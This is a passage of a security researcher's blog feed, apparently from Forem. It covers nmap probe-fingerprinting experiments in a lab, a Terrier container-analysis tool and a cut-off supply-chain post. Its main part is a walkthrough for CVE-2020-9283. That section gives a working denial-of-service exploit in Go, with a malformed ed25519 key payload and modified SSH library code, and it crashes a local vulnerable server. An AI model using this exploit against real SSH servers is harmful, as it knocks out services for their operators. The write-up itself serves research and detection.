class="s2">f9</span><span class="se">\x</span><span class="s2">e7</span><span class="se">\x</span><span class="s2">e7</span><span class="se">\x</span><span class="s2">f2</span><span class="se">\x</span><span class="s2">c6</span><span class="se">\x</span><span class="s2">eb</span><span class="se">\x</span><span class="s2">97</span><span class="se">\x</span><span class="s2">bb</span><span class="se">\x</span><span class="s2">b8</span><span class="se">\x</span><span class="s2">99</span><span class="se">\x</span><span class="s2">8f,</span><span class="se">\)</span><span class="s2"> SF:</span><span class="se">\x</span><span class="s2">a4K</span><span class="se">\x</span><span class="s2">dc</span><span class="se">\x</span><span class="s2">a3k</span><span class="se">\x</span><span class="s2">b0</span><span class="se">\x</span><span class="s2">20</span><span class="sb">`</span><span class="se">\[\x</span>19<span class="se">\x</span>ef<span class="se">\x</span>bf<span class="se">\x</span>b3#<span class="se">\x</span>bc<span class="se">\x</span>f0<span class="se">\x</span>06<span class="se">\x</span>05<span class="se">\x</span>20<span class="se">\x</span>c6<span class="se">\x</span>adK SF:<span class="se">\x</span>88<span class="se">\x</span>eb<span class="se">\x</span>0c<span class="se">\x</span>f8<span class="se">\x</span><span class="nb">dd</span><span class="se">\x</span>ab<span class="se">\x</span>adM<span class="se">\x</span>99<span class="se">\x</span>b4<span class="se">\x</span>d7d<span class="se">\x</span>e0<span class="se">\x</span>de<span class="se">\x</span>aa<span class="se">\x</span>02<span class="se">\x</span>17<span class="se">\x</span>b1h<span class="se">\(</span>~<span class="se">\</span> SF:xe8<span class="se">\x</span>f7<span class="se">\x</span>d7<span class="se">\?\x</span>13b<span class="se">\x</span>db<span class="se">\x</span>b9<span class="se">\x</span>17<span class="se">\x</span>a5<span class="se">\]\r\x</span>a70<span class="se">\x</span>b5<span class="se">\x</span>12<span class="se">\x</span>e6<span class="se">\r</span>pI2<span class="se">\x</span>01<span class="se">\x</span>a1sk<span class="se">\</span> SF:xf1<span class="se">\x</span><span class="nv">f5</span><span class="o">=</span><span class="se">\x</span>99<span class="se">\x</span>06<span class="se">\x</span>8e,<span class="se">\+\x</span>a1<span class="se">\x</span>8e<span class="se">\"</span>/f<span class="se">\x</span>af<span class="se">\x</span>d6<span class="se">\x</span>b5<span class="se">\x</span>06<span class="se">\x</span>ef<span class="se">\x</span>f6<span class="se">\x</span>204e<span class="se">\x</span>b4<span class="se">\x</span> SF:c5<span class="se">\x</span>83<span class="se">\x</span>c3<span class="se">\x</span>ec<span class="se">\t\x</span>9a<span class="se">\x</span>8c<span class="se">\x</span>87<span class="se">\x</span>92U<span class="se">\^\x</span>1eO<span class="se">\x</span>db<span class="se">\[</span>I<span class="se">\x</span>8d@<span class="se">\x</span>b3<span class="se">\x</span>c8p<span class="se">\x</span>db<span class="se">\x</span>ae<span class="se">\x</span> SF:94<span class="se">\x</span>98<span class="se">\x</span>ae<span class="se">\x</span>06<span class="se">\x</span>b5M<span class="se">\x</span>8ey0<span class="se">\x</span>80<span class="se">\x</span>f5<span class="se">\x</span>e0<span class="se">\x</span>de&gt;<span class="se">\x</span>d4&lt;6<span class="se">\x</span>08Q<span class="se">\x</span>12t<span class="se">\x</span>9a<span class="se">\x</span>a2<span class="se">\x</span>e4W SF:p<span class="se">\x</span>b2<span class="se">\x</span>19%<span class="se">\x</span>ea<span class="se">\x</span>a2<span class="se">\x</span>f0N:7<span class="se">\x</span>83<span class="se">\x</span>117<span class="se">\x</span>a6<span class="se">\x</span>11<span class="se">\x</span><span class="nv">d2w</span><span class="o">=</span><span class="se">\x</span>fbA<span class="se">\x</span>ef<span class="se">\x</span>1d<span class="se">\x</span>a6<span class="se">\x</span>e7t5 SF:byL<span class="se">\\\x</span>d6Y5%<span class="se">\x</span>c4<span class="se">\x</span>ee<span class="se">\x</span>dc<span class="se">\x</span>a2<span class="se">\x</span>b3X<span class="se">\x</span>17<span class="se">\x</span>a3<span class="se">\x</span>e9<span class="se">\x</span>c6:<span class="o">=</span>l<span class="se">\x</span>91<span class="se">\x</span>98<span class="se">\x</span>cb<span class="se">\x</span>9e<span class="se">\x</span>b SF:4<span class="se">\x</span>ed<span class="se">\x</span>9b<span class="se">\x</span>a5<span class="se">\x</span>e8<span class="se">\x</span>a4<span class="se">\x</span>e0<span class="se">\x</span>0b<span class="se">\x</span>db<span class="se">\x</span>deV<span class="se">\x</span>a0<span class="se">\x</span>8d<span class="se">\x</span>fb<span class="se">\x</span>f9<span class="se">\)\x</span>bd<span class="se">\x</span>ac<span class="o">{</span><span class="se">\x</span>d2<span class="se">\+</span> SF:<span class="se">\x</span>b1<span class="se">\x</span>075s<span class="se">\x</span>dc_<span class="se">\x</span>0e<span class="se">\x</span>c5<span class="se">\x</span>e3ZJ<span class="se">\x</span>c1Z<span class="se">\x</span>c7<span class="se">\x</span>e8<span class="se">\x</span>a2&gt;<span class="o">}</span><span class="se">\x</span>be<span class="se">\"\x</span>ac<span class="se">\x</span>ab<span class="se">\x</span>04<span class="se">\x</span>cc<span class="se">\</span> SF:xac<span class="se">\x</span>ab<span class="se">\x</span>92F<span class="se">\x</span>99w<span class="se">\x</span>fb<span class="se">\x</span>c7t<span class="se">\x</span>cc<span class="se">\x</span>edHp<span class="se">\x</span>ee<span class="se">\x</span>a3<span class="se">\x</span>9a-<span class="se">\x</span>a7<span class="se">\x</span>d4<span class="se">\x</span>1c<span class="se">\x</span>ba<span class="se">\x</span>87d<span class="se">\</span> SF:xb9<span class="se">\x</span>83R<span class="se">\x</span>bb<span class="se">\x</span>04<span class="se">\x</span>84m<span class="o">{</span>CS<span class="se">\x</span>8b<span class="se">\x</span>a0<span class="se">\"</span>w<span class="se">\x</span>b7<span class="se">\x</span>d3<span class="se">\+</span>g<span class="se">\x</span>18<span class="se">\x</span>20<span class="se">\x</span>93x<span class="se">\x</span>93<span class="se">\x</span>eaOs<span class="se">\x</span> SF:ff<span class="s2">"); MAC Address: 02:42:AC:11:00:02 (Unknown) Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 11.83 seconds </span></code></pre> </div> <p>From the output above, we can see that NMAP was able to determine that port 80 was open but could not verify the service and version. </p> <p>If we take a look at what we have determined at this point, we now know that the -sV defaults will send probes that contain the string "nmap" and "--version-intensity" set to 1 will result in no probes containing the string "nmap". So this leads to a natural question, at which intensity level does the string "nmap" get sent with the NMAP probes? Well easy-peasy-lemon-squeezy, lets use our tool to help us. Lets setup our server again with:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>root@78b5ecfeb870:/work# <span class="nb">export </span><span class="nv">PORT</span><span class="o">=</span>80 root@78b5ecfeb870:/work# <span class="nb">export </span><span class="nv">TERM</span><span class="o">=</span>nmap root@78b5ecfeb870:/work# go build <span class="nt">-o</span> garbanzo <span class="o">&amp;&amp;</span> ./garbanzo 2020/06/10 12:02:40 <span class="nv">$GARBANZO_WEB</span> must be <span class="nb">set </span>2020/06/10 12:02:40 <span class="nv">$GARBANZO_HOST</span> must be <span class="nb">set </span>2020/06/10 12:02:40 <span class="o">[</span>+] Initialised Listener on Port: 80 </code></pre> </div> <p>and run NMAP with "--version-intensity" set to 2.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>root@f5f84eb31bc0:/go# nmap <span class="nt">-sT</span> <span class="nt">-sV</span> 172.17.0.2 <span class="nt">-p</span> 80 <span class="nt">--version-intensity</span> 2 </code></pre> </div> <p>which results in the following tool output:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="o">[</span>+] Initialised Listener on Port: 80 <span class="o">[</span>+] <span class="o">[</span>cb2cfd7735d96677652e77940170a0a4c695b4145fa93f7c885628df551671d7] Port:80 Connection:1 from:172.17.0.3:51288 <span class="o">[</span>ERROR] <span class="o">[</span>cb2cfd7735d96677652e77940170a0a4c695b4145fa93f7c885628df551671d7] <span class="nb">read </span>tcp4 172.17.0.2:80-&gt;172.17.0.3:51288: <span class="nb">read</span>: connection reset by peer <span class="o">[</span>+] <span class="o">[</span>50982846ac83afffab217e22573baae530ad966028d29b4c0f1d77c71c8dce16] Port:80 Connection:2 from:172.17.0.3:51290 <span class="o">[</span>+] <span class="o">[</span>6d95e9d08c551bda3d97565334aa089396600c62b9b4fae5847156ef596a6d5e] Port:80 Connection:3 from:172.17.0.3:51292 <span class="o">[</span>+] <span class="o">[</span>71fbba3e7c6949cfed8bb15ab2708a34cc20cbe5d4d5c60ca6d139ef0a3e3a4b] Port:80 Connection:4 from:172.17.0.3:51294 <span class="o">[</span>+] <span class="o">[</span>c774af05a3d1e12d779d86d8a23eb6daac54a3ebed1d4af18d68378ad47bc6af] Port:80 Connection:5 from:172.17.0.3:51296 <span class="o">[</span>+] <span class="o">[</span>dcd29b657bd7399ada9d76144cef8fc56615d356dcee1e448ea9dd675c8d5af3] Port:80 Connection:6 from:172.17.0.3:51298 <span class="o">[</span>+] <span class="o">[</span>be510f1d5fdb54ee007f0bf7613e9df76a8d9e17cb106a999f6c78c5865e7967] Port:80 Connection:7 from:172.17.0.3:51300 <span class="o">[</span>+] <span class="o">[</span>9ffc5a4a8c704547d2f7d9d995d8c55d4ad807d01124642fff9500bb7615c091] Port:80 Connection:8 from:172.17.0.3:51302 <span class="o">[</span>+] <span class="o">[</span>460ec7db181855235ef0f78e2f99f0779af42fcf083ccd42e23e05dd6b2d8d2a] Port:80 Connection:9 from:172.17.0.3:51304 </code></pre> </div> <p>Okay so intensity level 2 has no "nmap" term in the probes. If we repeat this process(left to the reader to do) and increase the intensity +1, we'll determine that level 7 is the level where NMAP sends the term "nmap" in its probes. Another interesting observation is that the number of connections made by NMAP also increases with the intensity level. For example, the follow NMAP command:<br> </p> <p><code>bash nmap -sT -sV 172.17.0.2 -p 80 --version-intensity 6</code><br> </p> <p>results in 24 connections made by NMAP. I'll leave it to you, the reader to verify this statement :)</p> <h3> References </h3> <p>1.<a href="https://nmap.org/book/scan-methods-connect-scan.html">https://nmap.org/book/scan-methods-connect-scan.html</a><br> 2.<a href="https://nmap.org/book/man-version-detection.html">https://nmap.org/book/man-version-detection.html</a></p> Chris Mon, 08 Jun 2020 13:11:44 +0000 https://forem.com/brompwnie/modifying-go-s-crypto-ssh-library-for-cve-2020-9283-26a7 https://forem.com/brompwnie/modifying-go-s-crypto-ssh-library-for-cve-2020-9283-26a7 <p>Recently CVE-2020-9283 was patched by the Go maintainers with this <a href="https://github.com/golang/crypto/commit/bac4c82f69751a6dd76e702d54b3ceb88adab236">commit</a>. This vulnerability exploits an issue in how the SSH library parses ssh-ed25519 or <a href="mailto:sk-ssh-ed25519@openssh.com">sk-ssh-ed25519@openssh.com</a><br> public keys and can cause an SSH server to panic, which results in a Denial of Service (DoS). Upon further investigation of this issue, it became apparent that this was a trivial issue to exploit and I found an example exploit in this <a href="https://github.com/mark-adams/exploits/tree/master/CVE-2020-9283">repo</a> which utilises Python and the Paramiko package to execute SSH commands. </p> <p>The repo above provides a useful PoC which contains a Python script which triggers the panic and also provides a vulnerable Go SSH server and patched Go SSH server. After playing with the PoC a bit, I decided to replicate the exploit in Go. I decided this for multiple reasons, the main being I was curious as to how Go implemented the SSH protocol and a personal preference of not having to use Python.</p> <p>After looking at Go's SSH <a href="https://pkg.go.dev/golang.org/x/crypto/ssh?tab=doc">library</a> it was clear that there was no easy way to issue commands as the same way that the Paramiko library does. For example, to issue a SSH Service auth request using Paramiko you use the following:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="p">...</span> <span class="n">m</span> <span class="o">=</span> <span class="n">paramiko</span><span class="p">.</span><span class="n">Message</span><span class="p">()</span> <span class="n">m</span><span class="p">.</span><span class="n">add_byte</span><span class="p">(</span><span class="n">cMSG_SERVICE_REQUEST</span><span class="p">)</span> <span class="p">...</span> </code></pre> </div> <p>The above snippet is not possible to replicate in Go and there's a few more requests that have to be made on the SSH protocol level such as the Auth_Request which occurs after the service request. I won't go into too much detail on the SSH protocol but I highly recommend reading RFC4252 which can be found <a href="https://tools.ietf.org/html/rfc4252#section-5">here</a>.</p> <p>So to trigger the exploit using Go, we are required to do the following:</p> <ol> <li>Issue a SSH_MSG_SERVICE_ACCEPT</li> <li>Issue a SSH_MSG_USERAUTH_REQUEST <ul> <li>Provide a malicious public key which is just a public key which is too short</li> <li>Provide a signature</li> </ul> </li> </ol> <p>In order to achieve this, we need to see how Go implements the SSH protocol and modify what is sent to the target server to ensure that our malicious public key is sent.</p> <p>In this post, our payload aka Public Key is the following:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>\x00\x00\x00\x0bssh-ed25519\x00\x00\x00\x15aaa-aaa-aa-aaa-aaaaa </code></pre> </div> <p>however we will be working with the ASCII HEX representation in our Go code so it will look like this:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>0000000b7373682d65643235353139000000156161612d616161612d61612d6161612d6161616161 </code></pre> </div> <p>There is no way in the Go library to just "send" this public key so what we can do is establish a SSH handshake on the transport layer and let Go send the auth requests but change the public key sent. This is what our Go code will look like which will invoke the Go SSH library:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight go"><code> <span class="k">func</span> <span class="n">setupKeyAndDial</span><span class="p">(</span><span class="n">addr</span><span class="p">,</span> <span class="n">user</span><span class="p">,</span> <span class="n">keyfile</span> <span class="kt">string</span><span class="p">)</span> <span class="o">*</span><span class="n">ssh</span><span class="o">.</span><span class="n">Client</span> <span class="p">{</span> <span class="n">key</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">ioutil</span><span class="o">.</span><span class="n">ReadFile</span><span class="p">(</span><span class="n">keyfile</span><span class="p">)</span> <span class="k">if</span> <span class="n">err</span> <span class="o">!=</span> <span class="no">nil</span> <span class="p">{</span> <span class="n">fmt</span><span class="o">.</span><span class="n">Println</span><span class="p">(</span><span class="s">"[ERROR]"</span><span class="p">,</span> <span class="n">err</span><span class="p">)</span> <span class="p">}</span> <span class="n">signer</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">ssh</span><span class="o">.</span><span class="n">ParsePrivateKey</span><span class="p">(</span><span class="n">key</span><span class="p">)</span> <span class="k">if</span> <span class="n">err</span> <span class="o">!=</span> <span class="no">nil</span> <span class="p">{</span> <span class="n">fmt</span><span class="o">.</span><span class="n">Println</span><span class="p">(</span><span class="s">"[ERROR]"</span><span class="p">,</span> <span class="n">err</span><span class="p">)</span> <span class="p">}</span> <span class="n">config</span> <span class="o">:=</span> <span class="o">&amp;</span><span class="n">ssh</span><span class="o">.</span><span class="n">ClientConfig</span><span class="p">{</span> <span class="n">User</span><span class="o">:</span> <span class="n">user</span><span class="p">,</span> <span class="n">Auth</span><span class="o">:</span> <span class="p">[]</span><span class="n">ssh</span><span class="o">.</span><span class="n">AuthMethod</span><span class="p">{</span> <span class="n">ssh</span><span class="o">.</span><span class="n">PublicKeys</span><span class="p">(</span><span class="n">signer</span><span class="p">),</span> <span class="p">},</span> <span class="n">HostKeyCallback</span><span class="o">:</span> <span class="n">ssh</span><span class="o">.</span><span class="n">HostKeyCallback</span><span class="p">(</span><span class="k">func</span><span class="p">(</span><span class="n">hostname</span> <span class="kt">string</span><span class="p">,</span> <span class="n">remote</span> <span class="n">net</span><span class="o">.</span><span class="n">Addr</span><span class="p">,</span> <span class="n">key</span> <span class="n">ssh</span><span class="o">.</span><span class="n">PublicKey</span><span class="p">)</span> <span class="kt">error</span> <span class="p">{</span> <span class="k">return</span> <span class="no">nil</span> <span class="p">}),</span> <span class="p">}</span> <span class="k">return</span> <span class="n">Dial</span><span class="p">(</span><span class="s">"tcp"</span><span class="p">,</span> <span class="n">addr</span><span class="p">,</span> <span class="n">config</span><span class="p">)</span> <span class="p">}</span> <span class="k">func</span> <span class="n">Dial</span><span class="p">(</span><span class="n">network</span><span class="p">,</span> <span class="n">addr</span> <span class="kt">string</span><span class="p">,</span> <span class="n">config</span> <span class="o">*</span><span class="n">ssh</span><span class="o">.</span><span class="n">ClientConfig</span><span class="p">)</span> <span class="o">*</span><span class="n">ssh</span><span class="o">.</span><span class="n">Client</span> <span class="p">{</span> <span class="n">client</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">ssh</span><span class="o">.</span><span class="n">Dial</span><span class="p">(</span><span class="n">network</span><span class="p">,</span> <span class="n">addr</span><span class="p">,</span> <span class="n">config</span><span class="p">)</span> <span class="k">if</span> <span class="n">err</span> <span class="o">!=</span> <span class="no">nil</span> <span class="p">{</span> <span class="nb">panic</span><span class="p">(</span><span class="n">err</span><span class="p">)</span> <span class="p">}</span> <span class="k">return</span> <span class="n">client</span> <span class="p">}</span> </code></pre> </div> <p>From the code above, you can see that our payload is not there and this is just regular Go code to create an SSH client. What we actually do is modify our local Go SSH package which is used by the code above. We start with modifying the files located on our host which can be found at:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>/Users/user/go/pkg/mod/golang.org/x/crypto@v0.0.0-20200510223506-06a226fb4e37/ssh/*** </code></pre> </div> <p>After much digging around, I located the function which is responsible for performing the SSH auth request aka "SSH_MSG_USERAUTH_REQUEST". The file is client_auth.go and the function is located on line 214 on my version and has the following signature:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight go"><code><span class="k">func</span> <span class="p">(</span><span class="n">cb</span> <span class="n">publicKeyCallback</span><span class="p">)</span> <span class="n">auth</span><span class="p">(</span><span class="n">session</span> <span class="p">[]</span><span class="kt">byte</span><span class="p">,</span> <span class="n">user</span> <span class="kt">string</span><span class="p">,</span> <span class="n">c</span> <span class="n">packetConn</span><span class="p">,</span> <span class="n">rand</span> <span class="n">io</span><span class="o">.</span><span class="n">Reader</span><span class="p">)</span> <span class="p">(</span><span class="n">authResult</span><span class="p">,</span> <span class="p">[]</span><span class="kt">string</span><span class="p">,</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span> </code></pre> </div> <p>The following code snippet below was/is super useful to identify where and what functions are calling specific functions in Go code and you'll find this pasted throughout the code in the Github repo:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight go"><code><span class="n">_</span><span class="p">,</span> <span class="n">file</span><span class="p">,</span> <span class="n">no</span><span class="p">,</span> <span class="n">ok</span> <span class="o">:=</span> <span class="n">runtime</span><span class="o">.</span><span class="n">Caller</span><span class="p">(</span><span class="m">1</span><span class="p">)</span> <span class="k">if</span> <span class="n">ok</span> <span class="p">{</span> <span class="n">fmt</span><span class="o">.</span><span class="n">Printf</span><span class="p">(</span><span class="s">"[(client_auth.go)auth 212] called from %s#%d</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">file</span><span class="p">,</span> <span class="n">no</span><span class="p">)</span> <span class="p">}</span> </code></pre> </div> <p>The code above produces output to STDOUT when you run your compiled code, for example:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>[(client_auth.go)auth 212] called from /Users/user/go/pkg/mod/golang.org/x/crypto@v0.0.0-20200510223506-06a226fb4e37/ssh/client_auth.go#58 </code></pre> </div> <p>Great stuff, now all we need to do is to ensure that instead of sending the public key we created in our Go code, we would like to send the malicious public key. In order to achieve this, we modify the function auth with the following changes:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight go"><code><span class="n">sshPayload</span> <span class="o">:=</span> <span class="s">"0000000b7373682d65643235353139000000156161612d616161612d61612d6161612d6161616161"</span> <span class="n">sshPayloadBytes</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">hex</span><span class="o">.</span><span class="n">DecodeString</span><span class="p">(</span><span class="n">sshPayload</span><span class="p">)</span> <span class="k">if</span> <span class="n">err</span> <span class="o">!=</span> <span class="no">nil</span> <span class="p">{</span> <span class="n">log</span><span class="o">.</span><span class="n">Fatal</span><span class="p">(</span><span class="n">err</span><span class="p">)</span> <span class="p">}</span> <span class="c">// manually wrap the serialized signature in a string</span> <span class="n">s</span> <span class="o">:=</span> <span class="n">Marshal</span><span class="p">(</span><span class="n">sign</span><span class="p">)</span> <span class="n">sig</span> <span class="o">:=</span> <span class="nb">make</span><span class="p">([]</span><span class="kt">byte</span><span class="p">,</span> <span class="n">stringLength</span><span class="p">(</span><span class="nb">len</span><span class="p">(</span><span class="n">s</span><span class="p">)))</span> <span class="n">marshalString</span><span class="p">(</span><span class="n">sig</span><span class="p">,</span> <span class="n">s</span><span class="p">)</span> <span class="n">msg</span> <span class="o">:=</span> <span class="n">publickeyAuthMsg</span><span class="p">{</span> <span class="n">User</span><span class="o">:</span> <span class="n">user</span><span class="p">,</span> <span class="n">Service</span><span class="o">:</span> <span class="n">serviceSSH</span><span class="p">,</span> <span class="n">Method</span><span class="o">:</span> <span class="n">cb</span><span class="o">.</span><span class="n">method</span><span class="p">(),</span> <span class="n">HasSig</span><span class="o">:</span> <span class="no">true</span><span class="p">,</span> <span class="c">// PubKey: pubKey,</span> <span class="n">PubKey</span><span class="o">:</span> <span class="n">sshPayloadBytes</span><span class="p">,</span> <span class="n">Sig</span><span class="o">:</span> <span class="n">sig</span><span class="p">,</span> <span class="p">}</span> </code></pre> </div> <p>From the code above, we've made minimal changes, we've converted our ASCII HEX payload to a byte slice and then modified the struct "publickeyAuthMsg" to use our byte slice "sshPayloadBytes" instead of "pubKey" where "pubKey" is the legitimate public key.</p> <p>And voila, we've made the required changes. We're now ready to invoke our Go code against a target server and see what happens. We can launch our exploit against the vulnerable server attached in the Github repo by doing the following:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>./CVE-2020-9283 -h Usage of ./CVE-2020-9283: -host string IP address of SSH host to target (default "localhost") -key string ssh-ed25519 private key to use (default "thekey") -port string Port to target (default "22") # ./CVE-2020-9283 -port=2022 ./CVE-2020-9283 -port=2022 +] Sploit for CVE-2020-9283 [+] Attempting to pwn: localhost:2022 [!] Attempting: cMSG_USERAUTH_REQUEST [+] userAuthRequestMsg User: notme [+] userAuthRequestMsg Service: ssh-connection [ERROR] ssh: handshake failed: EOF [+] This should have invoked a panic on the SSH target i.e 'panic: ed25519: bad public key length' </code></pre> </div> <p>and on our server, we should see a panic which contains something like the following stack trace:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>./target-vulnerable Vulnerable SSH server running on 0.0.0.0:2022 panic: ed25519: bad public key length: 21 goroutine 34 [running]: crypto/ed25519.Verify(0xc000176050, 0x15, 0x6c, 0xc00009c200, 0x89, 0x100, 0xc00017607c, 0x40, 0x40, 0xc000110260) /usr/local/Cellar/go/1.13.1/libexec/src/crypto/ed25519/ed25519.go:175 +0x458 golang.org/x/crypto/ed25519.Verify(...) /Users/user/go/pkg/mod/golang.org/x/crypto@v0.0.0-20200219234226-1ad67e1f0ef4/ed25519/ed25519_go113.go:72 golang.org/x/crypto/ssh.ed25519PublicKey.Verify(0xc000176050, 0x15, 0x6c, 0xc00009c200, 0x89, 0x100, 0xc00008c080, 0x28, 0x7f) /Users/user/go/pkg/mod/golang.org/x/crypto@v0.0.0-20200219234226-1ad67e1f0ef4/ssh/keys.go:587 +0x1a0 golang.org/x/crypto/ssh.(*connection).serverAuthenticate(0xc0000fe200, 0xc0000c29c0, 0x11, 0x40, 0x0) /Users/user/go/pkg/mod/golang.org/x/crypto@v0.0.0-20200219234226-1ad67e1f0ef4/ssh/server.go:567 +0x160d golang.org/x/crypto/ssh.(*connection).serverHandshake(0xc0000fe200, 0xc0000c29c0, 0x1207b70, 0x1b, 0x1391aa0) /Users/user/go/pkg/mod/golang.org/x/crypto@v0.0.0-20200219234226-1ad67e1f0ef4/ssh/server.go:277 +0x59f golang.org/x/crypto/ssh.NewServerConn(0x1242140, 0xc0000bc018, 0xc0000c2820, 0x0, 0x0, 0x0, 0x0, 0x0) /Users/user/go/pkg/mod/golang.org/x/crypto@v0.0.0-20200219234226-1ad67e1f0ef4/ssh/server.go:206 +0x17f main.handleConnection(0x1242140, 0xc0000bc018, 0xc0000c2820) /Users/user/go/src/github.com/mark-adams/exploits/CVE-2020-9283/target-vulnerable/main.go:43 +0x5a created by main.main /Users/user/go/src/github.com/mark-adams/exploits/CVE-2020-9283/target-vulnerable/main.go:98 +0x23d </code></pre> </div> <p>and there we go, we've got a Go based version to exploit this CVE. You can get the source code and precompiled binaries on my Github -&gt; <a href="https://github.com/brompwnie/CVE-2020-9283">https://github.com/brompwnie/CVE-2020-9283</a>.</p> <p>Additionally, if you would like to detect if this attack has been launched against you (IOC's), you can search your logs for stack traces that contain bad key length errors.</p> <p>References<br> 1 <a href="https://skarlso.github.io/2019/02/17/go-ssh-with-host-key-verification/">https://skarlso.github.io/2019/02/17/go-ssh-with-host-key-verification/</a><br> 2 <a href="https://bridge.grumpy-troll.org/2017/04/golang-ssh-security/">https://bridge.grumpy-troll.org/2017/04/golang-ssh-security/</a><br> 3 <a href="https://github.com/golang/crypto/blob/81e90905daefcd6fd217b62423c0908922eadb30/ssh/example_test.go#L143">https://github.com/golang/crypto/blob/81e90905daefcd6fd217b62423c0908922eadb30/ssh/example_test.go#L143</a><br> 4 <a href="https://www.iana.org/assignments/ssh-parameters/ssh-parameters.xml#ssh-parameters-1">https://www.iana.org/assignments/ssh-parameters/ssh-parameters.xml#ssh-parameters-1</a><br> 5 <a href="https://pkg.go.dev/golang.org/x/crypto/ssh?tab=doc">https://pkg.go.dev/golang.org/x/crypto/ssh?tab=doc</a><br> 6 <a href="https://github.com/golang/go/issues/8581">https://github.com/golang/go/issues/8581</a><br> 7 <a href="https://tools.ietf.org/html/rfc4252#section-5">https://tools.ietf.org/html/rfc4252#section-5</a><br> 8 <a href="https://github.com/golang/crypto/commit/bac4c82f69751a6dd76e702d54b3ceb88adab236">https://github.com/golang/crypto/commit/bac4c82f69751a6dd76e702d54b3ceb88adab236</a><br> 9 <a href="https://github.com/mark-adams/exploits/tree/master/CVE-2020-9283">https://github.com/mark-adams/exploits/tree/master/CVE-2020-9283</a><br> 10 <a href="https://github.com/brompwnie/CVE-2020-9283">https://github.com/brompwnie/CVE-2020-9283</a></p> go exploit security hacking Chris Thu, 12 Mar 2020 22:25:51 +0000 https://forem.com/brompwnie/identifying-deprecated-go-modules-with-gocheckit-4g0 https://forem.com/brompwnie/identifying-deprecated-go-modules-with-gocheckit-4g0 <p>Identifying Deprecated Go modules is not supported by default by the Go ecosystem so I created a small tool (Gocheckit) to help me identify potentially Deprecated modules for a Go project. You can find the tool and more info here on Github here <a href="https://github.com/brompwnie/gocheckit">https://github.com/brompwnie/gocheckit</a>.</p> <p>I'll probably write a proper post at a later point describing the tool and processes in more detail.</p> go devops security Chris Wed, 15 Jan 2020 16:00:00 +0000 https://forem.com/heroku/terrier-an-open-source-tool-for-identifying-and-analyzing-container-and-image-components-508h https://forem.com/heroku/terrier-an-open-source-tool-for-identifying-and-analyzing-container-and-image-components-508h <p>As part of our Blackhat Europe talk <a href="https://www.blackhat.com/eu-19/briefings/schedule/#reverse-engineering-and-exploiting-builds-in-the-cloud-17287">“Reverse Engineering and Exploiting Builds in the Cloud”</a> we publicly released a new tool called Terrier.</p> <p>In this blog post, I am going to show you how Terrier can help you identify and verify container and image components for a wide variety of use-cases, be it from a supply-chain perspective or forensics perspective. Terrier can be found on Github <a href="https://github.com/heroku/terrier">https://github.com/heroku/terrier</a>.</p> <h2> Containers and images </h2> <p>In this blog post, I am not going to go into too much detail about containers and images (you can learn more <a href="https://www.opencontainers.org/about">here</a>) however it is important to highlight a few characteristics of containers and images that make them interesting in terms of Terrier. Containers are run from images and currently the Open Containers Initiative (OCI) is the most popular format for images. The remainder of this blog post refers to OCI images as images.</p> <p>Essentially images are tar archives that container multiple tar archives and meta-information that represent the “layers” of an image. The OCI format of images makes images relatively simple to work with which makes analysis relatively simple. If you only had access to a terminal and the tar command, you could pretty much get what you need from the image’s tar archive.</p> <p>When images are utilised at runtime for a container, their contents become the contents of the running container and the layers are essentially extracted to a location on the container’s runtime host. The container runtime host is the host that is running and maintaining the containers. This location is typically <code>/var/lib/docker/overlay2/&lt;containerID&gt;/</code>. This location contains a few folders of interest, particularly the "merged" folder. The "merged" folder contains the contents of the image and any changes that have occurred in the container since its creation. For example, if the image contained a location such as <code>/usr/chris/stuff</code> and after creating a container from this image I created a file called <code>helloworld.txt</code> at the location <code>/usr/chris/stuff</code>. This would result in the following valid path on the container runtime host <code>/var/lib/docker/overlay2/&lt;containerID&gt;/merged/usr/chris/stuff/helloworld.txt</code>.</p> <h2> What does Terrier do? </h2> <p>Now that we have a brief understanding of images and containers, we can look at what Terrier does. Often it is the case that you would like to determine if an image or container contains a specific file. This requirement may be due to a forensic analysis need or to identify and prevent a certain supply-chain attack vector. Regardless of the requirement, having the ability to determine the presence of a specific file in an image or container is useful.</p> <h3> Identifying files in OCI images </h3> <p>Terrier can be used to determine if a specific image contains a specific file. In order to do this, you need the following:</p> <ol> <li>An OCI Image i.e TAR archive</li> <li>A SHA256 hash of a specific file/s</li> </ol> <p>The first point can be easily achieved with Docker by using the following command:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nv">$ </span>docker save imageid <span class="nt">-o</span> myImage.tar </code></pre> </div> <p>The command above uses a Docker image ID which can be obtained using the following command:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nv">$ </span>docker images </code></pre> </div> <p>Once you have your image exported as a tar archive, you will then need to establish the SHA256 hash of the particular file you would like to identify in the image. There are multiple ways to achieve this but in this example, we are going to use the hash of the Golang binary <em>go1.13.4 linux/amd64</em> which can be achieved with following command on a Linux host:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nv">$ </span><span class="nb">cat</span> /usr/local/go/bin/go | <span class="nb">sha256sum</span> </code></pre> </div> <p>The command above should result in the following SHA256 hash: 